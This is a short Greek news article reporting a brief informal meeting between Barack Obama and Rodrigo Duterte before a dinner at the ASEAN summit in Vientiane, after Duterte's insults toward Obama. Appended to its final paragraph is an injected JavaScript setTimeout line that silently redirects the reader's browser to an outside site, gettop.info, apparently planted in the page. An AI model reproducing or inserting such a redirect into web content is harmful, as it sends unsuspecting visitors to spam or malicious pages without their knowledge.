Άτυπη συνάντηση Ομπάμα-Ντουάρτε παρά την προσβολή

0
11

 

Μετά τον σάλο που προκάλεσε ο πρόεδρος των Φιλιππίνων με τις προσβολές του προς τον ομόλογό του των ΗΠΑ, οι δύο άνδρες είχαν μία σύντομη, άτυπη συνάντηση.

Η συνάντησή τους έγινε λίγο πριν από ένα δείπνο κατά τη διάρκεια της συνόδου του Συνδέσμου Κρατών της Νοτιοανατολικής Ασίας (ASEAN) στη Βιεντιάν, στο Λάος, διευκρίνισαν αξιωματούχοι. Αρχικά, σύμφωνα με την προεδρία των Φιλιππίνων, ήταν προγραμματισμένο οι δύο άνδρες να καθίσουν δίπλα δίπλα, κάτι που δεν έγινε.

«Συναντήθηκαν σε έναν χώρο αναμονής, ήταν οι τελευταίοι που έφυγαν. Δεν γνωρίζω πόση ώρα μίλησαν», είπε στον Τύπο ο υπουργός Εξωτερικών των Φιλιππίνων, Περφέκτο Γιασάι, δηλώνοντας «πολύ ευτυχής» που έγινε η συνάντηση.

Σε μια επιγραμματική ανακοίνωσή του, ο Λευκός Οίκος γνωστοποίησε ότι ο Ομπάμα «είχε μια σύντομη συνομιλία με τον Πρόεδρο Ντουτέρτε» στον χώρο αναμονής των ηγετών που συμμετέχουν στη σύνοδο του ASEAN πριν από το δείπνο, προσθέτοντας πως οι δύο ηγέτες αντάλλαξαν «αστεία». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here